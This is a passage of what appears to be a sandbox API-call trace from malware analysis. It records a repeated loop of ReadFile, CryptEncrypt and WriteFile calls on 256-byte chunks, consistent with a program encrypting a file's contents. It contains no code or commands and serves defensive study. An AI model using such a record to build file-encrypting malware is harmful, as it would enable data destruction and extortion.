lpOverlapped=0x0) returned 1 [0144.943] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.943] GetLastError () returned 0x0 [0144.943] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.943] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.943] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.943] GetLastError () returned 0x0 [0144.943] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.944] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.944] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.944] GetLastError () returned 0x0 [0144.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.944] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.944] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.944] GetLastError () returned 0x0 [0144.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.944] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.944] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.944] GetLastError () returned 0x0 [0144.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.944] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.944] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.944] GetLastError () returned 0x0 [0144.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.944] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.944] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.944] GetLastError () returned 0x0 [0144.944] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.945] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.945] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.945] GetLastError () returned 0x0 [0144.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.945] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.945] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.945] GetLastError () returned 0x0 [0144.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.945] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.945] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.945] GetLastError () returned 0x0 [0144.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.945] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.945] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.945] GetLastError () returned 0x0 [0144.945] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.945] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.945] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.946] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.946] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.946] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.946] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.946] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.946] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.946] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.946] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.946] GetLastError () returned 0x0 [0144.946] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.947] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.947] GetLastError () returned 0x0 [0144.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.947] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.947] GetLastError () returned 0x0 [0144.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.947] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.947] GetLastError () returned 0x0 [0144.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.947] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.947] GetLastError () returned 0x0 [0144.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.947] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.947] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.947] GetLastError () returned 0x0 [0144.947] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.948] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.948] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.948] GetLastError () returned 0x0 [0144.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.948] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.948] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.948] GetLastError () returned 0x0 [0144.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.948] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.948] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.948] GetLastError () returned 0x0 [0144.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.948] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.948] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.948] GetLastError () returned 0x0 [0144.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.948] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.948] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.948] GetLastError () returned 0x0 [0144.948] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.949] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.949] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.949] GetLastError () returned 0x0 [0144.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.949] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.949] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.949] GetLastError () returned 0x0 [0144.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.949] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.949] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.949] GetLastError () returned 0x0 [0144.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.949] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.949] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.949] GetLastError () returned 0x0 [0144.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.949] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.949] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.949] GetLastError () returned 0x0 [0144.949] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.950] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.950] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.950] GetLastError () returned 0x0 [0144.950] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.950] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.950] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 